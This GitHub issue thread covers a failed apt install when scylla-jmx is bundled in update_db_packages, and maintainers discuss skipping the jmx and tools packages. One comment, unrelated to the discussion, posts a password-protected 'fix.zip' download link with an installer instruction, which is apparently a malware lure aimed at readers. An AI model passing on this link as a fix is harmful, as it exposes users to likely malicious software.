### ISSUE TITLE
Fail to run test with scylla-jmx bundled in update_db_packages pack

### ISSUE THREAD

**Issue by soyacz** [scylladb/scylla-cluster-tests#8474]
When setting `update_db_packages` param with a bundle containing scylla-jmx it causes later problems with packages installation because latest images don't contain java:
```
Command: 'sudo DEBIAN_FRONTEND=noninteractive apt-get -o DPkg::Lock::Timeout=120 -o Dpkg::Options::="--force-confold" -o Dpkg::Options::="--force-confdef" install -y lsof net-tools'
Exit code: 100
Stdout:
scylla-enterprise-jmx : Depends: openjdk-11-jre-headless but it is not going to be installed or
openjdk-11-jre but it is not going to be installed or
oracle-java11-set-default but it is not installable
scylla-enterprise-tools-core : Depends: openjdk-8-jre-headless but it is not going to be installed or
openjdk-8-jre but it is not going to be installed or
oracle-java8-set-default but it is not installable or
adoptopenjdk-8-hotspot-jre but it is not installable or
openjdk-11-jre-headless but it is not going to be installed or
openjdk-11-jre but it is not going to be installed or
oracle-java11-set-default but it is not installable
Stderr:
E: Unmet dependencies. Try 'apt --fix-broken install' with no packages (or specify a solution).
```

We should whether skip installation of scylla-jmx or install java.

## Impact

Fail the test with provided binaries

## How frequently does it reproduce?

When developer builds a pack with scylla-jmx and tries to use it in `update_db_packages`.

## Installation details

Cluster size: 3 nodes (i3en.2xlarge)

Scylla Nodes used in this run:
- perf-latency-nemesis-ubuntu-db-node-8334ed9f-3 (54.77.251.9 | 10.4.3.90) (shards: 7)
- perf-latency-nemesis-ubuntu-db-node-8334ed9f-2 (34.254.180.246 | 10.4.1.156) (shards: 7)
- perf-latency-nemesis-ubuntu-db-node-8334ed9f-1 (3.250.53.248 | 10.4.2.47) (shards: 7)

OS / Image: `ami-0c6e012613f908379` (aws: undefined_region)

Test: `scylla-enterprise-perf-regression-latency-650gb-with-nemesis-tablets`
Test id: `8334ed9f-f80b-4d61-960d-a40cb6024eb2`
Test name: `scylla-staging/lukasz/scylla-enterprise-perf-regression-latency-650gb-with-nemesis-tablets`
Test method: `performance_regression_test.PerformanceRegressionTest.test_latency_write_with_nemesis`
Test config file(s):

- [perf-regression-latency-650gb-with-nemesis.yaml](https://github.com/scylladb/scylla-cluster-tests/blob/df0ddda2bc09b6aa6a228834c59d32b44afff99e/test-cases/performance/perf-regression-latency-650gb-with-nemesis.yaml)

<details>
<summary>
Logs and commands
</summary>

- Restore Monitor Stack command: `$ hydra investigate show-monitor 8334ed9f-f80b-4d61-960d-a40cb6024eb2`
- Restore monitor on AWS instance using [Jenkins job](https://jenkins.scylladb.com/view/QA/job/QA-tools/job/hydra-show-monitor/parambuild/?test_id=8334ed9f-f80b-4d61-960d-a40cb6024eb2)
- Show all stored logs command: `$ hydra investigate show-logs 8334ed9f-f80b-4d61-960d-a40cb6024eb2`

## Logs:
- **db-cluster-8334ed9f.tar.gz** - [https://cloudius-jenkins-test.s3.amazonaws.com/8334ed9f-f80b-4d61-960d-a40cb6024eb2/20240828_065225/db-cluster-8334ed9f.tar.gz](https://cloudius-jenkins-test.s3.amazonaws.com/8334ed9f-f80b-4d61-960d-a40cb6024eb2/20240828_065225/db-cluster-8334ed9f.tar.gz)
- **sct-runner-events-8334ed9f.tar.gz** - [https://cloudius-jenkins-test.s3.amazonaws.com/8334ed9f-f80b-4d61-960d-a40cb6024eb2/20240828_065225/sct-runner-events-8334ed9f.tar.gz](https://cloudius-jenkins-test.s3.amazonaws.com/8334ed9f-f80b-4d61-960d-a40cb6024eb2/20240828_065225/sct-runner-events-8334ed9f.tar.gz)
- **sct-8334ed9f.log.tar.gz** - [https://cloudius-jenkins-test.s3.amazonaws.com/8334ed9f-f80b-4d61-960d-a40cb6024eb2/20240828_065225/sct-8334ed9f.log.tar.gz](https://cloudius-jenkins-test.s3.amazonaws.com/8334ed9f-f80b-4d61-960d-a40cb6024eb2/20240828_065225/sct-8334ed9f.log.tar.gz)
- **loader-set-8334ed9f.tar.gz** - [https://cloudius-jenkins-test.s3.amazonaws.com/8334ed9f-f80b-4d61-960d-a40cb6024eb2/20240828_065225/loader-set-8334ed9f.tar.gz](https://cloudius-jenkins-test.s3.amazonaws.com/8334ed9f-f80b-4d61-960d-a40cb6024eb2/20240828_065225/loader-set-8334ed9f.tar.gz)
- **monitor-set-8334ed9f.tar.gz** - [https://cloudius-jenkins-test.s3.amazonaws.com/8334ed9f-f80b-4d61-960d-a40cb6024eb2/20240828_065225/monitor-set-8334ed9f.tar.gz](https://cloudius-jenkins-test.s3.amazonaws.com/8334ed9f-f80b-4d61-960d-a40cb6024eb2/20240828_065225/monitor-set-8334ed9f.tar.gz)

[Jenkins job URL](https://jenkins.scylladb.com/job/scylla-staging/job/lukasz/job/scylla-enterprise-perf-regression-latency-650gb-with-nemesis-tablets/2/)
[Argus](https://argus.scylladb.com/test/b29d4d49-8184-4429-96d3-32a15b1316a9/runs?additionalRuns[]=8334ed9f-f80b-4d61-960d-a40cb6024eb2)
</details>

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by soyacz** [comment]
affects also scylla-enterprise-tools-core

**Comment by soyacz** [comment]
and scylla-enterprise-tools

**Comment by fruch** [comment]
we should skip the jmx and tools, we don't really need them on master and above

we can leave an option, for when dealing with older versions...

**Comment by soyacz** [comment]
> we should skip the jmx and tools, we don't really need them on master and above
> 
> we can leave an option, for when dealing with older versions...

We can fix it on master/6.0/6.1/2024.2, older versions anyway should use proper SCT branch.

**Comment by fruch** [comment]
the jmx was completely taken out of the build, and this issue shouldn't be happening on master/enterprise anymore
